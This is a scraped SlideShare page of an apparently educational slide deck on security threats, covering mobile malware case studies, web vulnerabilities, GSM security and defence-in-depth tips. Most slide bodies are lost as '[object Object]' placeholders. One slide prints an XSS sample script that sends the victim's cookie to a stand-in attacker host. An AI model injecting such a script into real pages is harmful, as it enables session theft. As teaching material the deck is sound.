SlideShare uma empresa Scribd logo
1 de 83
Baixar para ler offline
Security and Communication
Security Concept ,[object Object],[object Object],[object Object]
[object Object],[object Object],[object Object],[object Object]
Current threats by mobile malware ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Several types of attacks relevant to small devices   ,[object Object],[object Object],[object Object]
[object Object]
[object Object]
[object Object]
Threats and vulnerabilities in wireless networks and handheld devices   ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
More than  80%  of enterprise's digitized information  reside in individual hard drives  and in personal files and 80% of the data is unstructured, not secure nor backed up. Individuals hold the key to the knowledge economy and most of it is lost when they leave the enterprise Employees get 50%-75% of their relevant information directly from other people Today’s Information Challenge Source:  Gartner Group/CIBC World Markets
Trust C o nfidence to transact Security principles   C onfidentiality Ensure privacy of user information and transmission I ntegrity Ensure accuracy of data and data processing A vailability Maximize functionality and uptime
To protect your system against those attacks, information  security is also focused on these three areas: ,[object Object],[object Object],[object Object]
Internet Security Vulnerabilities ,[object Object]
Browsers   ,[object Object],[object Object],[object Object],[object Object],[object Object]
Operating Systems ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Server settings ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Software / Web Applications Bugs ,[object Object],[object Object],[object Object],[object Object]
Network Channels ,[object Object],[object Object],[object Object]
Threats / Attacks ,[object Object],[object Object],[object Object],<script>document.location= 'http://attackherhost.example/cgi-bin/cookiesteal.cgi?  '+document.cookie</script> The following are samples of XXS: The script sends the user’s cookie to attacker’s host.
[object Object],[object Object],[object Object]
[object Object]
Buffer overflow ,[object Object]
Malicious File Execution ,[object Object],[object Object],[object Object],[object Object],[object Object]
Trojan horse programs ,[object Object],[object Object],[object Object]
Email spoofing ,[object Object],[object Object]
Denial-of-Service (DoS) ,[object Object]
Unprotected Windows shares ,[object Object],[object Object]
Chat clients ,[object Object],[object Object],[object Object]
Packet sniffing ,[object Object],[object Object]
Dictionary or Brute Force Attack ,[object Object],[object Object],[object Object]
Handset Security Issues (1) ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Handset Malware History (1) ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Case Study – CABIR ,[object Object],[object Object],[object Object],[object Object],[object Object]
Case Study - ComWar ,[object Object],[object Object],[object Object],[object Object],[object Object]
Case Study - CardTrap ,[object Object],[object Object],[object Object],[object Object]
Handset Malware History (2) ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Android.Pjapps –  Risk Level 1: Very Low ,[object Object],[object Object],[object Object]
The images below show the installation process of a clean Steam Window application and a malicious one
 
When the Trojan is executed, it requests permissions to perform the following actions: ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Android.Pjapps - Removal ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Key Handset Security Problems ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Jailbroken iPhones and Upgrades ,[object Object],[object Object],[object Object]
Greenpois0n for iOS 4.2.1
But Beware  Fake  Jailbreaking Apps
And When You  Do  Get Successfully Jailbroken ,[object Object],[object Object]
The “ikee” Worm
The “Duh” Worm
Mobile Malware May Exploit Vulnerable Apps ,[object Object]
PDF Vulnerabilities on the iPhone mygadgetnews.com/2010/10/03/pdf-vulnerability-being-used-for-malicious-purposes-on-iphone-ios/
App Vetting and Third Party App Sources ,[object Object],[object Object]
A Sample Malicious Android Application
Threats to Network Operator ,[object Object],[object Object],[object Object]
GSM Security Operation ,[object Object],[object Object],[object Object],[object Object]
GSM Security Operation (Cont..) ,[object Object],[object Object],[object Object],[object Object]
GSM Security Operation (Cont..) ,[object Object],[object Object],[object Object]
Mitigation Strategies ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Methods/Techniques to Secure your Data / System ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
[object Object],[object Object],[object Object],[object Object],[object Object]
[object Object],[object Object],[object Object],[object Object]
[object Object],[object Object],[object Object]
8 Steps to Secure Your Computer ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
What is Defense in Depth ,[object Object],[object Object]
Defense in Depth ,[object Object],[object Object],[object Object],Policies, Procedures, & Awareness OS hardening, update management, authentication Firewalls, VPN quarantine Guards, locks, tracking devices, HSM Network segments, IPSec, NIDS Application hardening, antivirus ACL, encryption User education against social engineering Physical Security Perimeter Internal Network Host Application Data
The Identity Lifecycle ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Architecture
Security Risk Analysis ,[object Object],[object Object],[object Object],[object Object],[object Object]
Threat Modeling ,[object Object],[object Object],[object Object],[object Object],[object Object],1. Identify Assets 2. Create an Architecture Overview 3. Decompose the System 4. Identify the Threats 5. Document the Threats 6. Rate the Threats
Email Safety Tips ,[object Object],[object Object],[object Object],[object Object],[object Object]
Managing Spam Email Spam is often more of an annoyance than a security risk. However many email viruses are sent as spam and can be caught by spam filters.
Spoof Email (Phishing) ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],Phishing emails  are an attempt by thieves to lure you into divulging personal and financial information, for their profit. They pretend to be from well-known legitimate businesses, and increasingly look as if they actually are. They use clever techniques to induce a sense of urgency on your part so that you don't stop to think about whether they are legitimate or not. You can learn to know what to look for and where to report these scams when you find them.
Don’t Send Sensitive Data in Email ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],Although it's convenient to send colleagues  sensitive data   in email, it is unsafe. Not only is email an insecure way of sending information, you've lost control over that information once you hit the send button.
Mobile security tips   ,[object Object],[object Object]
[object Object]
[object Object],[object Object],[object Object]
[object Object],[object Object]
[object Object],[object Object]
Kaspersky Mobile Security ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Security risk assessment  ,[object Object],[object Object],[object Object],[object Object],[object Object]
Infrastructure
Applications
Operations
People

Mais conteúdo relacionado

Mais procurados

Web Server Web Site Security
Web Server Web Site SecurityWeb Server Web Site Security
Web Server Web Site SecuritySteven Cahill
 
Top 10 web server security flaws
Top 10 web server security flawsTop 10 web server security flaws
Top 10 web server security flawstobybear30
 
Phishing, Pharming, and the latest potholes on the Information Highway
Phishing, Pharming, and the latest potholes on the Information HighwayPhishing, Pharming, and the latest potholes on the Information Highway
Phishing, Pharming, and the latest potholes on the Information HighwayKevin Lim
 
Sophos Threatsaurus: The A-Z of Computer and Data Security Threats
Sophos Threatsaurus: The A-Z of Computer and Data Security ThreatsSophos Threatsaurus: The A-Z of Computer and Data Security Threats
Sophos Threatsaurus: The A-Z of Computer and Data Security ThreatsConnecting Up
 
Ch03 Network and Computer Attacks
Ch03 Network and Computer AttacksCh03 Network and Computer Attacks
Ch03 Network and Computer Attacksphanleson
 
Security vulnerability
Security vulnerabilitySecurity vulnerability
Security vulnerabilityA. Shamel
 
Types of Malware (CEH v11)
Types of Malware (CEH v11)Types of Malware (CEH v11)
Types of Malware (CEH v11)EC-Council
 
Data and Message Security
Data and Message SecurityData and Message Security
Data and Message SecurityNrapesh Shah
 
Mis security system threads
Mis security system threadsMis security system threads
Mis security system threadsLeena Reddy
 
Software Security Testing
Software Security TestingSoftware Security Testing
Software Security Testingsrivinayak
 
Sreerag cs network security
Sreerag cs network securitySreerag cs network security
Sreerag cs network securitySreerag Gopinath
 
Security Holes and Vulnerabilities in Corporate Network_Pre Null Meet Kolkata
Security Holes and Vulnerabilities in Corporate Network_Pre Null Meet KolkataSecurity Holes and Vulnerabilities in Corporate Network_Pre Null Meet Kolkata
Security Holes and Vulnerabilities in Corporate Network_Pre Null Meet Kolkataamiyadutta
 
Most Common Application Level Attacks
Most Common Application Level AttacksMost Common Application Level Attacks
Most Common Application Level AttacksEC-Council
 
Types Of Computer Security Attacks
Types Of Computer Security AttacksTypes Of Computer Security Attacks
Types Of Computer Security AttacksCentextech
 
Application security testing an integrated approach
Application security testing   an integrated approachApplication security testing   an integrated approach
Application security testing an integrated approachIdexcel Technologies
 
1 security goals
1   security goals1   security goals
1 security goalsdrewz lin
 

Mais procurados (20)

Web Server Web Site Security
Web Server Web Site SecurityWeb Server Web Site Security
Web Server Web Site Security
 
Security threats
Security threatsSecurity threats
Security threats
 
Top 10 web server security flaws
Top 10 web server security flawsTop 10 web server security flaws
Top 10 web server security flaws
 
Phishing, Pharming, and the latest potholes on the Information Highway
Phishing, Pharming, and the latest potholes on the Information HighwayPhishing, Pharming, and the latest potholes on the Information Highway
Phishing, Pharming, and the latest potholes on the Information Highway
 
Sophos Threatsaurus: The A-Z of Computer and Data Security Threats
Sophos Threatsaurus: The A-Z of Computer and Data Security ThreatsSophos Threatsaurus: The A-Z of Computer and Data Security Threats
Sophos Threatsaurus: The A-Z of Computer and Data Security Threats
 
Ch03 Network and Computer Attacks
Ch03 Network and Computer AttacksCh03 Network and Computer Attacks
Ch03 Network and Computer Attacks
 
Security vulnerability
Security vulnerabilitySecurity vulnerability
Security vulnerability
 
Lect13 security
Lect13   securityLect13   security
Lect13 security
 
Types of Malware (CEH v11)
Types of Malware (CEH v11)Types of Malware (CEH v11)
Types of Malware (CEH v11)
 
Data and Message Security
Data and Message SecurityData and Message Security
Data and Message Security
 
Mis security system threads
Mis security system threadsMis security system threads
Mis security system threads
 
Software Security Testing
Software Security TestingSoftware Security Testing
Software Security Testing
 
Sreerag cs network security
Sreerag cs network securitySreerag cs network security
Sreerag cs network security
 
Security Holes and Vulnerabilities in Corporate Network_Pre Null Meet Kolkata
Security Holes and Vulnerabilities in Corporate Network_Pre Null Meet KolkataSecurity Holes and Vulnerabilities in Corporate Network_Pre Null Meet Kolkata
Security Holes and Vulnerabilities in Corporate Network_Pre Null Meet Kolkata
 
Most Common Application Level Attacks
Most Common Application Level AttacksMost Common Application Level Attacks
Most Common Application Level Attacks
 
Types Of Computer Security Attacks
Types Of Computer Security AttacksTypes Of Computer Security Attacks
Types Of Computer Security Attacks
 
Computer security
Computer securityComputer security
Computer security
 
Application security testing an integrated approach
Application security testing   an integrated approachApplication security testing   an integrated approach
Application security testing an integrated approach
 
1 security goals
1   security goals1   security goals
1 security goals
 
Types of cyber attacks
Types of cyber attacksTypes of cyber attacks
Types of cyber attacks
 

Semelhante a Security communication

Computer security system Unit1.pptx
Computer security system Unit1.pptxComputer security system Unit1.pptx
Computer security system Unit1.pptxVIRAJDEY1
 
Ch # 10 computer security risks and safe guards
Ch # 10 computer security risks and safe guardsCh # 10 computer security risks and safe guards
Ch # 10 computer security risks and safe guardsMuhammadRobeel3
 
INTERNET SECURITY.pptx
INTERNET SECURITY.pptxINTERNET SECURITY.pptx
INTERNET SECURITY.pptxbabepa2317
 
Computing safety
Computing safetyComputing safety
Computing safetyBrulius
 
Information Security Lecture Notes
Information Security Lecture NotesInformation Security Lecture Notes
Information Security Lecture NotesFellowBuddy.com
 
Chapter 2 konsep dasar keamanan
Chapter 2 konsep dasar keamananChapter 2 konsep dasar keamanan
Chapter 2 konsep dasar keamanannewbie2019
 
Overview of Vulnerability Scanning.pptx
Overview of Vulnerability Scanning.pptxOverview of Vulnerability Scanning.pptx
Overview of Vulnerability Scanning.pptxAjayKumar73315
 
Web and Mobile Application Security
Web and Mobile Application SecurityWeb and Mobile Application Security
Web and Mobile Application SecurityPrateek Jain
 
Network security chapter 1,2
Network security chapter  1,2Network security chapter  1,2
Network security chapter 1,2Education
 
Chapter 2 konsep dasar keamanan
Chapter 2 konsep dasar keamananChapter 2 konsep dasar keamanan
Chapter 2 konsep dasar keamanannewbie2019
 
E commerce security 4
E commerce security 4E commerce security 4
E commerce security 4Anne ndolo
 
Internet safety and you
Internet safety and youInternet safety and you
Internet safety and youArt Ocain
 
Network and Security-2.pptx
Network and Security-2.pptxNetwork and Security-2.pptx
Network and Security-2.pptxDhanvanthkesavan
 
The Maple County court is redesigning its network to ensure more secu.docx
 The Maple County court is redesigning its network to ensure more secu.docx The Maple County court is redesigning its network to ensure more secu.docx
The Maple County court is redesigning its network to ensure more secu.docxKomlin1
 
attack vectors by chimwemwe.pptx
attack vectors  by chimwemwe.pptxattack vectors  by chimwemwe.pptx
attack vectors by chimwemwe.pptxJenetSilence
 

Semelhante a Security communication (20)

Chapter 10.0
Chapter 10.0Chapter 10.0
Chapter 10.0
 
Computer security system Unit1.pptx
Computer security system Unit1.pptxComputer security system Unit1.pptx
Computer security system Unit1.pptx
 
Network security
Network securityNetwork security
Network security
 
Ch # 10 computer security risks and safe guards
Ch # 10 computer security risks and safe guardsCh # 10 computer security risks and safe guards
Ch # 10 computer security risks and safe guards
 
INTERNET SECURITY.pptx
INTERNET SECURITY.pptxINTERNET SECURITY.pptx
INTERNET SECURITY.pptx
 
Computing safety
Computing safetyComputing safety
Computing safety
 
Insecurity vssut
Insecurity vssutInsecurity vssut
Insecurity vssut
 
Information Security Lecture Notes
Information Security Lecture NotesInformation Security Lecture Notes
Information Security Lecture Notes
 
Chapter 2 konsep dasar keamanan
Chapter 2 konsep dasar keamananChapter 2 konsep dasar keamanan
Chapter 2 konsep dasar keamanan
 
Overview of Vulnerability Scanning.pptx
Overview of Vulnerability Scanning.pptxOverview of Vulnerability Scanning.pptx
Overview of Vulnerability Scanning.pptx
 
Web and Mobile Application Security
Web and Mobile Application SecurityWeb and Mobile Application Security
Web and Mobile Application Security
 
Network security chapter 1,2
Network security chapter  1,2Network security chapter  1,2
Network security chapter 1,2
 
Chapter 2 konsep dasar keamanan
Chapter 2 konsep dasar keamananChapter 2 konsep dasar keamanan
Chapter 2 konsep dasar keamanan
 
Network security and viruses
Network security and virusesNetwork security and viruses
Network security and viruses
 
E commerce security 4
E commerce security 4E commerce security 4
E commerce security 4
 
Internet safety and you
Internet safety and youInternet safety and you
Internet safety and you
 
Network and Security-2.pptx
Network and Security-2.pptxNetwork and Security-2.pptx
Network and Security-2.pptx
 
The Maple County court is redesigning its network to ensure more secu.docx
 The Maple County court is redesigning its network to ensure more secu.docx The Maple County court is redesigning its network to ensure more secu.docx
The Maple County court is redesigning its network to ensure more secu.docx
 
attack vectors by chimwemwe.pptx
attack vectors  by chimwemwe.pptxattack vectors  by chimwemwe.pptx
attack vectors by chimwemwe.pptx
 
Network srcurity
Network srcurityNetwork srcurity
Network srcurity
 

Security communication

  • 2.
  • 3.
  • 4.
  • 5.
  • 6.
  • 7.
  • 8.
  • 9.
  • 10. More than 80% of enterprise's digitized information reside in individual hard drives and in personal files and 80% of the data is unstructured, not secure nor backed up. Individuals hold the key to the knowledge economy and most of it is lost when they leave the enterprise Employees get 50%-75% of their relevant information directly from other people Today’s Information Challenge Source: Gartner Group/CIBC World Markets
  • 11. Trust C o nfidence to transact Security principles C onfidentiality Ensure privacy of user information and transmission I ntegrity Ensure accuracy of data and data processing A vailability Maximize functionality and uptime
  • 12.
  • 13.
  • 14.
  • 15.
  • 16.
  • 17.
  • 18.
  • 19.
  • 20.
  • 21.
  • 22.
  • 23.
  • 24.
  • 25.
  • 26.
  • 27.
  • 28.
  • 29.
  • 30.
  • 31.
  • 32.
  • 33.
  • 34.
  • 35.
  • 36.
  • 37.
  • 38. The images below show the installation process of a clean Steam Window application and a malicious one
  • 39.  
  • 40.
  • 41.
  • 42.
  • 43.
  • 45. But Beware Fake Jailbreaking Apps
  • 46.
  • 49.
  • 50. PDF Vulnerabilities on the iPhone mygadgetnews.com/2010/10/03/pdf-vulnerability-being-used-for-malicious-purposes-on-iphone-ios/
  • 51.
  • 52. A Sample Malicious Android Application
  • 53.
  • 54.
  • 55.
  • 56.
  • 57.
  • 58.
  • 59.
  • 60.
  • 61.
  • 62.
  • 63.
  • 64.
  • 65.
  • 67.
  • 68.
  • 69.
  • 70. Managing Spam Email Spam is often more of an annoyance than a security risk. However many email viruses are sent as spam and can be caught by spam filters.
  • 71.
  • 72.
  • 73.
  • 74.
  • 75.
  • 76.
  • 77.
  • 78.
  • 79.

Notas do Editor

  1. This talks to the stats – but tell them with all these issues – with lack of controls – it becomes easy to have fraud You have no control and no accoutablity
  2. 04/22/11 04:06